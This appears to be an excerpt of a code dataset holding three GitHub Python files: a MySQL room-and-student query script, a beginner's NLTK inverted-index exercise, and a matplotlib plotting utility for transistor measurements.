wrap\n\n\ndef execute_query(sql_query, cursor):\n cursor.execute(sql_query)\n res = cursor.fetchall()\n\n return res\n\n\n@timing\ndef get_rooms_students_count(cursor):\n \"\"\" Select rooms list and count students in room \"\"\"\n\n query_string = \"\"\"SELECT rooms.name as 'The room number', count(rooms.room_id) as 'number of students' \n FROM rooms INNER JOIN students ON rooms.room_id = students.room_id \n GROUP BY rooms.name, rooms.room_id\"\"\"\n\n return execute_query(query_string, cursor)\n\n\n@timing\ndef get_five_smallest_age_rooms(cursor):\n \"\"\" Select top 5 rooms with the smallest average age of students \"\"\"\n\n query_string = \"\"\"SELECT rooms.name as 'The room number', CAST(AVG(YEAR(NOW()) - YEAR(students.birthday)) as float)\n as 'Average age of students' \n FROM rooms INNER JOIN students ON rooms.room_id = students.room_id \n GROUP BY rooms.name \n ORDER BY AVG(YEAR(NOW()) - YEAR(students.birthday))\n LIMIT 5\"\"\"\n\n return execute_query(query_string, cursor)\n\n\n@timing\ndef get_five_biggest_rooms_with_age_difference(cursor):\n \"\"\" Select top 5 rooms with the biggest age difference among students \"\"\"\n\n query_string = \"\"\"SELECT rooms.name as 'The room number', CAST((MAX(YEAR(NOW()) - YEAR(students.birthday)))\n - (MIN(YEAR(NOW()) - YEAR(students.birthday))) as float) as 'The biggest age difference' \n FROM rooms INNER JOIN students ON rooms.room_id = students.room_id \n GROUP BY rooms.name \n ORDER BY (MAX(YEAR(NOW()) - YEAR(students.birthday))) - \n (MIN(YEAR(NOW()) - YEAR(students.birthday))) DESC \n LIMIT 5\"\"\"\n\n return execute_query(query_string, cursor)\n\n\n@timing\ndef get_rooms_with_different_sex_of_students(cursor):\n \"\"\" Select list of rooms where students of different sexes live\"\"\"\n\n query_string = \"\"\"SELECT room_id\n FROM STUDENTS \n GROUP BY room_id \n HAVING COUNT(DISTINCT sex) > 1 \"\"\"\n\n res_query_4 = execute_query(query_string, cursor)\n\n res_4 = []\n\n for room in res_query_4:\n res_4.append(\"Room \" + str(room['room_id'] - 1))\n return res_4\n\n\ndef do_task_work(file_students, file_rooms, format):\n try:\n connection = pymysql.connect(\n host=local_host,\n port=3306,\n user=user,\n password=password,\n database=db_name,\n cursorclass=pymysql.cursors.DictCursor\n )\n print(\"successfully connected...\")\n\n try:\n with connection.cursor() as cursor:\n recreate_table_if_needed(cursor)\n\n rooms = load_rooms_into_table_from_file(file_rooms, cursor, connection)\n students = load_students_into_table_from_file(file_students, cursor, connection)\n\n # Getting tasks results\n task_query_result1 = get_rooms_students_count(cursor)\n task_query_result2 = get_five_smallest_age_rooms(cursor)\n task_query_result3 = get_five_biggest_rooms_with_age_difference(cursor)\n task_query_result4 = get_rooms_with_different_sex_of_students(cursor)\n\n # adding tasks results to JSON\n json_result = {}\n json_result['task1_result'] = task_query_result1\n json_result['task2_result'] = task_query_result2\n json_result['task3_result'] = task_query_result3\n json_result['task4_result'] = task_query_result4\n\n # Determining file format and the data that we need to write to file\n results_file_name = \"\"\n data_to_write = None\n data_in_json = json.dumps(json_result, indent=4)\n\n format_lower = format.lower()\n if format_lower == \"json\":\n # if format is JSON - then just write it\n results_file_name = \"results.json\"\n data_to_write = data_in_json\n elif format_lower == \"xml\":\n # if format is XML then convert JSON result to XML\n data_in_xml = readfromstring(data_in_json)\n data_to_write = json2xml.Json2xml(data_in_xml).to_xml()\n results_file_name = \"results.xml\"\n\n # Writing results to JSON or XML file\n with open(results_file_name, \"w\", encoding=\"utf8\") as write_file:\n write_file.write(data_to_write)\n\n print(\"successfully\")\n\n finally:\n connection.close()\n\n except Exception as e:\n print(\"Connection refused\")\n print(e)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Convert json to json or xml\")\n parser.add_argument(\"-r\", help=\"Path to JSON file with rooms\")\n parser.add_argument(\"-s\", help=\"Path to JSON file with students\")\n parser.add_argument(\"-f\", help=\"Format for the output file JSON or XML\")\n args = parser.parse_args()\n\n do_task_work(args.s, args.r, args.f)\n","repo_name":"murkins/LeverX-task-3","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"70446435442","text":"import numpy as np\nimport nltk\nfrom nltk.tokenize import word_tokenize,sent_tokenize\nfrom nltk.corpus import stopwords\nfrom nltk.stem import PorterStemmer\nfrom tabulate import tabulate\nnltk.download('punkt')\nnltk.download('stopwords')\nps = PorterStemmer()\nstop_words = set(stopwords.words(\"english\"))\n\ndoc1 = \"The cat in the hat\"\ndoc2 = \"The cat sat on the mat\"\ndoc3 = \"The dog ate my homework\"\ndoc4 = \"I hate cats and dogs\"\n\ntoken1 = word_tokenize(doc1)\ntoken2 = word_tokenize(doc2)\ntoken3 = word_tokenize(doc3)\ntoken4 = word_tokenize(doc4)\n\nterm=token1+token2+token3+token4\n\nStemmingone = []\nStemmingtwo = []\nStemmingthree = []\nStemmingfour = []\nfor x in token1:\n Stemmingone.append(ps.stem(x))\nfor y in token2:\n Stemmingtwo.append(ps.stem(y))\nfor z in token3:\n Stemmingthree.append(ps.stem(z))\nfor m in token4:\n Stemmingfour.append(ps.stem(m))\n\nRemove_stopWordsone = []\nRemove_stopWordstwo = []\nRemove_stopWordsthree = []\nRemove_stopWordsfour = []\nfor i in Stemmingone:\n if i not in stop_words:\n Remove_stopWordsone.append(i)\nfor i in Stemmingtwo:\n if i not in stop_words:\n Remove_stopWordstwo.append(i)\nfor i in Stemmingthree:\n if i not in stop_words:\n Remove_stopWordsthree.append(i)\nfor i in Stemmingfour:\n if i not in stop_words:\n Remove_stopWordsfour.append(i)\n\n\n \nStemming = []\nfor w in Remove_stopWords:\n Stemming.append(ps.stem(w))\n\n \n \nLowerCaseone = []\nLowerCasetwo = []\nLowerCasethree = []\nLowerCasefour = []\nfor i in Remove_stopWordsone :\n LowerCaseone.append(i.lower())\nfor i in Remove_stopWordstwo :\n LowerCasetwo.append(i.lower())\nfor i in Remove_stopWordsthree :\n LowerCasethree.append(i.lower())\nfor i in Remove_stopWordsfour :\n LowerCasefour.append(i.lower())\n\nLowerCase = []\nfor i in term :\n LowerCase.append(i.lower())\n\nRemove_stopWords = []\nfor i in LowerCase:\n if i not in stop_words:\n Remove_stopWords.append(i)\n\n\nStemming = []\nfor w in Remove_stopWords:\n Stemming.append(ps.stem(w))\n\n\nUnique_elements= set(Stemming)\nUnique_elements_sort = sorted(Unique_elements)\n\n\ninverted_index = {}\ncount=0\nfor i, doc in enumerate(Unique_elements_sort):\n for term in doc.split():\n if term in inverted_index:\n inverted_index[term].add(i)\n \n else: inverted_index[term] = {i}\n \n\n\n\ncount = 0\nsave = []\nfrequency = []\nposting_list = []\nfor x in inverted_index:\n count=0\n save.append(x)\n frequency.append(x)\n for y in LowerCaseone:\n if x==y:\n count+=1\n save.append(\"Doc: (1)\")\n for z in LowerCasetwo:\n if x==z:\n count+=1\n save.append(\"Doc: (2)\")\n for m in LowerCasethree:\n if x==m:\n count+=1\n save.append(\"Doc: (3)\")\n \n for n in LowerCasefour:\n if x==n:\n count+=1\n save.append(\"Doc: (4)\")\n frequency.append(\"Frecuency : \" +str(count))\n\nprint(\"The Word : .....\" + \"The Frequency : ....\")\nprint()\nprint()\nfor u in frequency:\n print(u)\n print(\"--\")\nprint()\nprint(\"-----(Posting List)----\")\nprint()\nprint(\"The Word : .....\" + \"The Doc ID : ....\")\nprint()\nfor t in save:\n print(t)\n print(\"--\")\n#print(tabulate(save))\n\n","repo_name":"TheMostafax/Inverted_Index-using-python","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":3225,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"75"} +{"seq_id":"21016557766","text":"\"\"\"A utility designed to help with the creation a plots with matplotlib that all use a consistent style.\"\"\"\n\nimport matplotlib\nimport os\nimport sys\n\nif('ipykernel_launcher' in sys.argv[0]):\n\tpass\nelse:\n\tmatplotlib.use('agg')\n\nfrom matplotlib import pyplot as plt\nfrom matplotlib import colors as pltc\nfrom matplotlib import cm\nimport numpy as np\nimport io\nimport time\n\nfrom utilities import FET_Modeling as fet_model\nfrom utilities import SequenceGeneratorUtility as dgu\n\n\n# ********** Matplotlib Parameters **********\n\nplt.style.use('seaborn-paper')\n\n# plt.rcParams['mathtext.fontset'] = 'custom'\n# plt.rcParams['mathtext.rm'] = 'Arial'\n# plt.rcParams['mathtext.it'] = 'Arial'\n# plt.rcParams['mathtext.bf'] = 'Arial:bold'\n\n# plt.rcParams[\"font.family\"] = 'Times New Roman'\n# plt.rcParams['mathtext.rm'] = 'Times New Roman'\n# plt.rcParams['mathtext.it'] = 'Times New Roman'\n# plt.rcParams['mathtext.bf'] = 'Times New Roman'\n\n# Used for the DRC Abstract\nplt.rcParams['axes.labelsize'] = 12\nplt.rcParams['axes.titlesize'] = 12\nplt.rcParams['legend.fontsize'] = 8\nplt.rcParams['xtick.labelsize'] = 8\nplt.rcParams['ytick.labelsize'] = 8\nplt.rcParams['font.size'] = 8\n\n# Minimum Sizes based on Dr. Franklin's Publications (Body text is 10 pt)\nplt.rcParams['axes.labelsize'] = 6\nplt.rcParams['axes.titlesize'] = 6\nplt.rcParams['legend.fontsize'] = 4.5\nplt.rcParams['xtick.labelsize'] = 4.5\nplt.rcParams['ytick.labelsize'] = 4.5\nplt.rcParams['font.size'] = 4.5\n\n# Sizes based on Nature Nanotechnology (Body text is 9 pt)\nplt.rcParams['axes.labelsize'] = 7\nplt.rcParams['axes.titlesize'] = 7\nplt.rcParams['legend.fontsize'] = 7\nplt.rcParams['xtick.labelsize'] = 7\nplt.rcParams['ytick.labelsize'] = 7\nplt.rcParams['font.size'] = 7\n\n# Steven's preferences loosely based on Nature Nanotechnology (Body text is 9 pt)\nplt.rcParams['axes.labelsize'] = 7\nplt.rcParams['axes.titlesize'] = 7\nplt.rcParams['legend.fontsize'] = 6\nplt.rcParams['xtick.labelsize'] = 6\nplt.rcParams['ytick.labelsize'] = 6\nplt.rcParams['font.size'] = 6\n\ntry:\n\tplt.rcParams[\"legend.title_fontsize\"] = 6\nexcept:\n\t# this is new in Matplotlib version 3.0\n\tpass\n\nplt.rcParams['axes.labelpad'] = 0\nplt.rcParams['axes.titlepad'] = 6\nplt.rcParams['ytick.major.pad'] = 2\nplt.rcParams['xtick.major.pad'] = 2\n\nplt.rcParams['figure.figsize'] = [8,6]\nplt.rcParams['figure.titlesize'] = 8\nplt.rcParams['axes.formatter.use_mathtext'] = True\nplt.rcParams['axes.formatter.useoffset'] = False\nplt.rcParams['xtick.top'] = True\nplt.rcParams['ytick.right'] = True\nplt.rcParams['xtick.direction'] = 'in'\nplt.rcParams['ytick.direction'] = 'in'\nplt.rcParams['axes.axisbelow'] = False\n# plt.rcParams['figure.autolayout'] = True\n\nplt.rcParams['axes.linewidth'] = 0.5\nplt.rcParams['xtick.major.width'] = 0.5\nplt.rcParams['ytick.major.width'] = 0.5\nplt.rcParams['xtick.major.size'] = 3\nplt.rcParams['ytick.major.size'] = 3\n\nplt.rcParams['xtick.minor.width'] = 0.5\nplt.rcParams['ytick.minor.width'] = 0.5\nplt.rcParams['xtick.minor.size'] = 1\nplt.rcParams['ytick.minor.size'] = 1\n\nplt.rcParams['axes.formatter.limits'] = [-2, 4]\n\n# Change to Type 2/TrueType fonts (editable text)\nplt.rcParams['pdf.fonttype'] = 42\nplt.rcParams['ps.fonttype'] = 42\n\n# Add custom color-maps\nlight_to_dark_map = lambda R, G, B: dict({'red':((0.0, 0/255, 0/255), (0.5, R/255, R/255), (1.0, 255/255, 255/255)), 'green':((0.0, 0/255, 0/255), (0.5, G/255, G/255), (1.0, 255/255, 255/255)), 'blue':((0.0, 0/255, 0/255), (0.5, B/255, B/255), (1.0, 255/255, 255/255))})\ndark_to_light_map = lambda R, G, B: dict({'red':((0.0, 255/255, 255/255), (0.5, R/255, R/255), (1.0, 0/255, 0/255)), 'green':((0.0, 255/255, 255/255), (0.5, G/255, G/255), (1.0, 0/255, 0/255)), 'blue':((0.0, 255/255, 255/255), (0.5, B/255, B/255), (1.0, 0/255, 0/255))})\ncolor_to_color_map = lambda R1, G1, B1, R2, G2, B2: dict({'red':((0.0, R1/255, R1/255), (0.5, 0.5*(R1+R2)/255, 0.5*(R1+R2)/255), (1.0, R2/255, R2/255)), 'green':((0.0, G1/255, G1/255), (0.5, 0.5*(G1+G2)/255, 0.5*(G1+G2)/255), (1.0, G2/255, G2/255)), 'blue':((0.0, B1/255, B1/255), (0.5, 0.5*(B1+B2)/255, 0.5*(B1+B2)/255), (1.0, B2/255, B2/255))})\ncolor_to_color_to_color_map = lambda R1, G1, B1, R2, G2, B2, R3, G3, B3: dict({'red':((0.0, R1/255, R1/255), (0.5, R2/255, R2/255), (1.0, R3/255, R3/255)), 'green':((0.0, G1/255, G1/255), (0.5, G2/255, G2/255), (1.0, G3/255, G3/255)), 'blue':((0.0, B1/255, B1/255), (0.5, B2/255, B2/255), (1.0, B3/255, B3/255))})\n\ndef rgba_to_rgba_map(RGBA1, RGBA2):\n\tR1, G1, B1, A1 = RGBA1\n\tR2, G2, B2, A2 = RGBA2\n\n\tdescription = dict({\n\t\t'red':((0.0, R1/255, R1/255), (0.5, 0.5*(R1+R2)/255, 0.5*(R1+R2)/255), (1.0, R2/255, R2/255)),\n\t\t'green':((0.0, G1/255, G1/255), (0.5, 0.5*(G1+G2)/255, 0.5*(G1+G2)/255), (1.0, G2/255, G2/255)),\n\t\t'blue':((0.0, B1/255, B1/255), (0.5, 0.5*(B1+B2)/255, 0.5*(B1+B2)/255), (1.0, B2/255, B2/255)),\n\t\t'alpha':((0.0, A1/255, A1/255), (0.5, 0.5*(A1+A2)/255, 0.5*(A1+A2)/255), (1.0, A2/255, A2/255))\n\t})\n\tname = 'rgba_to_rgba_map' + ''.join([str(c) for c in [R1, G1, B1, A1, R2, G2, B2, A2]])\n\n\treturn pltc.LinearSegmentedColormap(name, description)\n\n# RGB\nplt.register_cmap(cmap=pltc.LinearSegmentedColormap('white_red_black', light_to_dark_map(237, 85, 59) ))\t\t#ed553b\nplt.register_cmap(cmap=pltc.LinearSegmentedColormap('white_green_black', light_to_dark_map(79, 185, 159) ))\t\t#4FB99F\nplt.register_cmap(cmap=pltc.LinearSegmentedColormap('white_blue_black', light_to_dark_map(31, 119, 180) ))\t\t#1f77b4\n\n# RGB - secondary\nplt.register_cmap(cmap=pltc.LinearSegmentedColormap('white_yellow_black', light_to_dark_map(242, 177, 52) ))\t#f2b134\nplt.register_cmap(cmap=pltc.LinearSegmentedColormap('white_purple_black', light_to_dark_map(115, 99, 175) ))\t#7363af\nplt.register_cmap(cmap=pltc.LinearSegmentedColormap('white_orange_black', light_to_dark_map(238, 117, 57) ))\t#ee7539\n\n# RGB - tertiary\nplt.register_cmap(cmap=pltc.LinearSegmentedColormap('white_maroon_black', light_to_dark_map(128, 0, 0) ))\t\t#800000\nplt.register_cmap(cmap=pltc.LinearSegmentedColormap('white_violet_black', light_to_dark_map(53, 25, 150) ))\t\t#351996\nplt.register_cmap(cmap=pltc.LinearSegmentedColormap('white_turquoise_black', light_to_dark_map(64, 224, 208) ))\t#40E0D0\nplt.register_cmap(cmap=pltc.LinearSegmentedColormap('white_teal_black', light_to_dark_map(28, 206, 167) ))\t\t#1ccea7\nplt.register_cmap(cmap=pltc.LinearSegmentedColormap('white_lime_black', light_to_dark_map(58, 226, 75) ))\t\t#3ae24b\n\n# Other\nplt.register_cmap(cmap=pltc.LinearSegmentedColormap('white_magenta_black', light_to_dark_map(159, 50, 133) ))\t#9F3285\nplt.register_cmap(cmap=pltc.LinearSegmentedColormap('white_peach_black', light_to_dark_map(255, 142, 101) ))\t#ff8e65\n\n# Multi-colored\nplt.register_cmap(cmap=pltc.LinearSegmentedColormap('blue_teal_orange', color_to_color_to_color_map(10, 30, 150, 100, 175, 170, 250, 200, 100) ))\n\n\n\n# === Matplotlib Access ===\ndef getPlt():\n\treturn plt\n\ndef show():\n\tprint('Showing plots from matplotlib.')\n\tplt.show()\n\n\n\n# *********** Plot Helper Functions ***********\n\"\"\"Every method in this utility is intended to assist the creation of new plotDefintions in the plotDefinitions folder.\"\"\"\n\n# === Device Plots ===\ndef extractSweep(axis, jsonData, direction='both', x_data='gate voltage', y_data='drain current', scaleYaxisBy=1, derivative=False, absoluteValue=False, reciprocal=False, logScale=False):\n\tdata_save_names = {\n\t\t'gate voltage': 'vgs_data',\n\t\t'drain voltage': 'vds_data',\n\t\t'gate current': 'ig_data',\n\t\t'drain current': 'id_data',\n\n\t\t'input voltage': 'vin_data',\n\t\t'output voltage': 'vout_data',\n\t\t'input current': 'iin_data',\n\t\t'output current': 'iout_data',\n\n\t\t'gate voltage for snr':'vgs_data_to_plot',\n\t\t'snr':'snr_to_plot'\n\t}\n\n\tx_data = data_save_names[x_data]\n\tx = list(jsonData['Results'][x_data])\n\n\ty_data = data_save_names[y_data]\n\ty = list(jsonData['Results'][y_data])\n\n\t# Figure out if data was collected with multiple points per x-value\n\tpointsPerX = 1\n\ttry:\n\t\tif(x_data == 'vgs_data'):\n\t\t\tpointsPerX = jsonData['runConfigs']['GateSweep']['pointsPerVGS']\n\t\telif(x_data == 'vds_data'):\n\t\t\tpointsPerX = jsonData['runConfigs']['DrainSweep']['pointsPerVDS']\n\t\telif(x_data == 'vin_data'):\n\t\t\tpointsPerX = jsonData['runConfigs']['InverterSweep']['pointsPerVIN']\n\texcept:\n\t\tpointsPerX = 1\n\n\t# Plot only forward or reverse sweeps of the data (also backwards compatible to old format)\n\tif(direction == 'forward'):\n\t\tforward_x = []\n\t\tforward_y = []\n\t\tfor i in [j for j in range(len(x)) if(j % 2 == 0)]:\n\t\t\tforward_x.append(x[i])\n\t\t\tforward_y.append(y[i])\n\t\tx = forward_x\n\t\ty = forward_y\n\telif(direction == 'reverse'):\n\t\treverse_x = []\n\t\treverse_y = []\n\t\tfor i in [j for j in range(len(x)) if(j % 2 == 1)]:\n\t\t\treverse_x.append(x[i])\n\t\t\treverse_y.append(y[i])\n\t\tx = reverse_x\n\t\ty = reverse_y\n\n\t# Convert x and y to list-of-list form for consistency across all possible data formats\n\tif(not isinstance(x[0], list)):\n\t\tx = [x]\n\t\ty = [y]\n\n\t# Take absolute value of y-data if showing on log scale\n\tif(logScale):\n\t\ty = np.abs(y)\n\n\t# If desired, can calculate the derivative of y with respect to x at each point and plot this instead\n\tif(derivative):\n\t\tdy_dx = []\n\t\tfor i in range(len(x)):\n\t\t\tx_segment = x[i]\n\t\t\ty_segment = y[i] if(not logScale) else (np.log10(y[i]))\n\t\t\t\n\t\t\t# Take the derivative over a window that scales with size of the data (and is >3)\n\t\t\tderivative_fit_length = int(3 + 2*int(len(x_segment)/20))\n\t\t\tN = int(derivative_fit_length/2)\n\t\t\t\n\t\t\t#dy_dx_segment = [(y_segment[j+N] - y_segment[j-N])/(x_segment[j+N] - x_segment[j-N]) for j in range(N, len(x_segment) - N)]\n\t\t\tdy_dx_segment = [linearFit(x_segment[j-N:j+N+1],y_segment[j-N:j+N+1])['slope'] for j in range(N, len(x_segment) - N)]\n\t\t\t\n\t\t\t# Trim x to match the dimensions of dy/dx\n\t\t\tx[i] = x_segment[N:-N]\n\t\t\tdy_dx.append(dy_dx_segment)\n\t\ty = dy_dx\n\n\t# If desired, calculate 1/data\t\n\tif(reciprocal):\n\t\ty = np.reciprocal(y)\n\n\t# If desired, force data to be all positive values\n\tif(absoluteValue):\n\t\ty = np.abs(y)\n\t\n\tif(isinstance(scaleYaxisBy, str)):\n\t\tscaleYaxisBy = jsonData['runConfigs'][jsonData['runType']][scaleYaxisBy]\n\t\t\n\t# Scale the data by a given factor\n\ty = np.array(y)*scaleYaxisBy\n\n\treturn (x, y, pointsPerX)\n\ndef plotAll(axis, x_list, y_list, lineColor, lineStyle=None, pointsPerX=1, errorBars=True, alpha=1):\n\t# Iterate through segments of x and y\n\tfor i in range(len(x_list)):\n\t\t# data contains multiple y-values per x-value\n\t\tif(pointsPerX > 1):\n\t\t\tline = plotWithErrorBars(axis, x_list[i], y_list[i], lineColor, pointsPerX, errorBars=errorBars)\n\t\telse:\n\t\t\tif(lineStyle == ''):\n\t\t\t\tline = axis.plot(x_list[i], y_list[i], color=lineColor, marker='o', markersize=2, linewidth=0, alpha=(alpha if(i >= len(x_list)-2) else 0.25))[0]\n\t\t\telse:\n\t\t\t\tline = axis.plot(x_list[i], y_list[i], color=lineColor, marker='o', markersize=2, linewidth=1, alpha=(alpha if(i >= len(x_list)-2) else 0.25), linestyle=lineStyle)[0]\n\treturn line\n\ndef plotSNR(axis, jsonData, lineColor, direction='both', scaleCurrentBy=1, lineStyle=None, errorBars=True):\n\tx, y, pointsPerX = extractSweep(axis, jsonData, direction='both', x_data='gate voltage for snr', y_data='snr', scaleYaxisBy=scaleCurrentBy)\n\tline = plotAll(axis, x, y, lineColor, lineStyle=lineStyle, pointsPerX=pointsPerX, errorBars=errorBars)\n\treturn line\n\t\n\ndef plotNoiseAxis(axis, x, y, lineColor, lineStyle=None):\n\taxis2 = axis.twinx()\n\t# Iterate through segments of x and y\n\tfor i in range(len(x)):\n\t\tif(lineStyle == ''):\n\t\t\tline2 = axis2.plot(x[i], y[i], color=lineColor, marker='o', markersize=2, linewidth=0, alpha=(1 if(i >= len(x)-2) else 0.25))[0]\n\t\telse:\n\t\t\tline2 = axis2.plot(x[i], y[i], color=lineColor, marker='o', markersize=2, linewidth=1, alpha=(1 if(i >= len(x)-2) else 0.25), linestyle=lineStyle)[0]\n\treturn axis2, line2\n\ndef plotSubthresholdCurve(axis, jsonData, lineColor, direction='both', lineStyle=None, errorBars=True, alpha=1):\n\tx, y, pointsPerX = extractSweep(axis, jsonData, direction, x_data='gate voltage', y_data='drain current', scaleYaxisBy=1, absoluteValue=True)\n\taxis.set_yscale('log')\n\tline = plotAll(axis, x, y, lineColor, lineStyle=lineStyle, pointsPerX=pointsPerX, errorBars=errorBars, alpha=alpha)\n\treturn line\n\ndef plotTransferCurve(axis, jsonData, lineColor, direction='both', scaleYaxisBy=1, lineStyle=None, errorBars=True, alpha=1):\n\tx, y, pointsPerX = extractSweep(axis, jsonData, direction, x_data='gate voltage', y_data='drain current', scaleYaxisBy=scaleYaxisBy)\n\tline = plotAll(axis, x, y, lineColor, pointsPerX=pointsPerX, lineStyle=lineStyle, errorBars=errorBars, alpha=alpha)\n\treturn line\n\ndef plotGateCurrent(axis, jsonData, lineColor, direction='both', scaleYaxisBy=1, lineStyle=None, errorBars=True, alpha=1):\n\tx, y, pointsPerX = extractSweep(axis, jsonData, direction, x_data='gate voltage', y_data='gate current', scaleYaxisBy=scaleYaxisBy)\n\tline = plotAll(axis, x, y, lineColor, pointsPerX=pointsPerX, lineStyle=lineStyle, errorBars=errorBars, alpha=alpha)\n\treturn line\n\ndef plotTransferResistanceCurve(axis, jsonData, lineColor, direction='both', scaleYaxisBy=1, lineStyle=None, errorBars=True, alpha=1):\n\tx, y, pointsPerX = extractSweep(axis, jsonData, direction, x_data='gate voltage', y_data='drain current', scaleYaxisBy='drainVoltageSetPoint', absoluteValue=True, reciprocal=True)\n\ty = scaleYaxisBy*np.array(y)\n\ty = np.abs(y)\n\taxis.set_yscale('log')\n\tline = plotAll(axis, x, y, lineColor, pointsPerX=pointsPerX, lineStyle=lineStyle, errorBars=errorBars, alpha=alpha)\n\treturn line\n\ndef plotOutputCurve(axis, jsonData, lineColor, direction='both', scaleYaxisBy=1, lineStyle=None, errorBars=True, alpha=1):\n\tx, y, pointsPerX = extractSweep(axis, jsonData, direction, x_data='drain voltage', y_data='drain current', scaleYaxisBy=scaleYaxisBy)\n\tline = plotAll(axis, x, y, lineColor, pointsPerX=pointsPerX, lineStyle=lineStyle, errorBars=errorBars, alpha=alpha)\n\treturn line\n\ndef plotOutputGateCurrent(axis, jsonData, lineColor, direction='both', scaleYaxisBy=1, lineStyle=None, errorBars=True, alpha=1):\n\tx, y, pointsPerX = extractSweep(axis, jsonData, direction, x_data='drain voltage', y_data='gate current', scaleYaxisBy=scaleYaxisBy)\n\tline = plotAll(axis, x, y, lineColor, pointsPerX=pointsPerX, lineStyle=lineStyle, errorBars=errorBars, alpha=alpha)\n\treturn line\n\ndef plotResistanceCurve(axis, jsonData, lineColor, direction='both', scaleYaxisBy=1, lineStyle=None, errorBars=True, alpha=1):\n\tx, y, pointsPerX = extractSweep(axis, jsonData, direction, x_data='drain voltage', y_data='drain current', scaleYaxisBy=1)\n\ty = scaleYaxisBy * np.array(x) / np.array(y)\n\tresolution_limit_volts = 1e-6\n\ty = [[y[i][j] for j in range(len(y[i])) if(abs(x[i][j]) > resolution_limit_volts)] for i in range(len(y))]\n\tx = [[x[i][j] for j in range(len(x[i])) if(abs(x[i][j]) > resolution_limit_volts)] for i in range(len(x))]\n\tline = plotAll(axis, x, y, lineColor, pointsPerX=pointsPerX, lineStyle=lineStyle, errorBars=errorBars, alpha=alpha)\n\treturn line\n\ndef plotFourPointResistanceCurve(axis, jsonData, lineColor, direction='both', scaleYaxisBy=1, lineStyle=None, errorBars=True, alpha=1):\n\tx, y, pointsPerX = extractSweep(axis, jsonData, direction, x_data='drain current', y_data='drain voltage', scaleYaxisBy=1)\n\tresolution_limit_volts = 1e-6\n\ty = [[y[i][j] for j in range(len(y[i])) if(abs(y[i][j]) > resolution_limit_volts)] for i in range(len(y))]\n\tx = [[x[i][j] for j in range(len(x[i])) if(abs(y[i][j]) > resolution_limit_volts)] for i in range(len(x))]\n\ty = scaleYaxisBy * np.array(y) / np.array(x)\n\tline = plotAll(axis, x, y, lineColor, pointsPerX=pointsPerX, lineStyle=lineStyle, errorBars=errorBars, alpha=alpha)\n\treturn line\n\ndef plotFourPointVoltageCurve(axis, jsonData, lineColor, direction='both', scaleYaxisBy=1, lineStyle=None, errorBars=True, alpha=1):\n\tx, y, pointsPerX = extractSweep(axis, jsonData, direction, x_data='drain current', y_data='drain voltage', scaleYaxisBy=scaleYaxisBy)\n\t#axis.set_xscale('log')\n\tline = plotAll(axis, x, y, lineColor, pointsPerX=pointsPerX, lineStyle=lineStyle, errorBars=errorBars, alpha=alpha)\n\treturn line\n\ndef plotOutputResistanceCurve(axis, jsonData, lineColor, direction='both', scaleYaxisBy=1, lineStyle=None, errorBars=True, alpha=1):\n\tx, y, pointsPerX = extractSweep(axis, jsonData, direction, x_data='drain voltage', y_data='drain current', scaleYaxisBy=scaleYaxisBy, derivative=True, absoluteValue=True, reciprocal=True)\n\ty = np.abs(y)\n\taxis.set_yscale('log')\n\tline = plotAll(axis, x, y, lineColor, pointsPerX=pointsPerX, lineStyle=lineStyle, errorBars=errorBars, alpha=alpha)\n\treturn line\n\ndef plotBurnOut(axis1, axis2, axis3, jsonData, lineColor, lineStyle=None, annotate=False, annotation='', plotLine1=True, plotLine2=True, plotLine3=True):\n\tline1, line2, line3 = None, None, None\n\tif(plotLine1):\n\t\tline1 = axis1.plot(jsonData['Results']['vds_data'], (np.array(jsonData['Results']['id_data'])*10**6), color=lineColor, linestyle=lineStyle)[0]\n\n\t# Add burn threshold annotation\n\tif(annotate):\n\t\tcurrentThreshold = np.percentile(np.array(jsonData['Results']['id_data']), 90) * jsonData['runConfigs']['BurnOut']['thresholdProportion'] * 10**6\n\t\taxis1.plot([0, jsonData['Results']['vds_data'][-1]], [currentThreshold, currentThreshold], color=lineColor, linestyle='--', linewidth=1)\n\t\taxis1.annotate(annotation, xy=(0, currentThreshold), xycoords='data', horizontalalignment='left', verticalalignment='bottom', color=lineColor)\n\n\tif(plotLine2):\n\t\tline2 = plotOverTime(axis2, jsonData['Results']['timestamps'], (np.array(jsonData['Results']['id_data'])*10**6), lineColor)\n\tif(plotLine3):\n\t\tline3 = plotOverTime(axis3, jsonData['Results']['timestamps'], jsonData['Results']['vds_data'], lineColor)\n\treturn (line1, line2, line3)\n\ndef plotStaticBias(axis, jsonData, lineColor, timeOffset, y_data='id_data', scaleYaxisBy=1e6, timescale='seconds', lineStyle=None, gradient=False, gradientColors=None):\n\tline = plotOverTime(axis, jsonData['Results']['timestamps'], (np.array(jsonData['Results'][y_data]) * scaleYaxisBy), lineColor, offset=timeOffset, markerSize=1.5, lineWidth=0.5, plotInnerGradient=gradient, innerGradientColors=gradientColors)\n\treturn line\n\ndef plotInverterVTC(axis, jsonData, lineColor, direction='both', lineStyle=None, errorBars=True, alpha=1):\n\tx, y, pointsPerX = extractSweep(axis, jsonData, direction, x_data='input voltage', y_data='output voltage', scaleYaxisBy=1)\n\tline = plotAll(axis, x, y, lineColor, pointsPerX=pointsPerX, lineStyle=lineStyle, errorBars=errorBars, alpha=alpha)\n\treturn line\n\ndef plotInverterGain(axis, jsonData, lineColor, direction='both', lineStyle=None, errorBars=True, alpha=1):\n\tx, y, pointsPerX = extractSweep(axis, jsonData, direction, x_data='input voltage', y_data='output voltage', scaleYaxisBy=1, derivative=True, absoluteValue=True)\n\tline = plotAll(axis, x, y, lineColor, pointsPerX=pointsPerX, lineStyle=lineStyle, errorBars=errorBars, alpha=alpha)\n\treturn line\n\ndef plotTransferCurveSlope(axis, jsonData, lineColor, direction='both', scaleYaxisBy=1, lineStyle=None, errorBars=True, alpha=1):\n\tx, y, pointsPerX = extractSweep(axis, jsonData, direction, x_data='gate voltage', y_data='drain current', scaleYaxisBy=scaleYaxisBy, derivative=True, absoluteValue=True)\n\tline = plotAll(axis, x, y, lineColor, pointsPerX=pointsPerX, lineStyle=lineStyle, errorBars=errorBars, alpha=alpha)\n\treturn line\n\ndef plotSubthresholdCurveSlope(axis, jsonData, lineColor, direction='both', x_axis='gate voltage', absoluteXaxis=False, scaleYaxisBy=1, lineStyle=None, errorBars=True, alpha=1):\n\tx1, 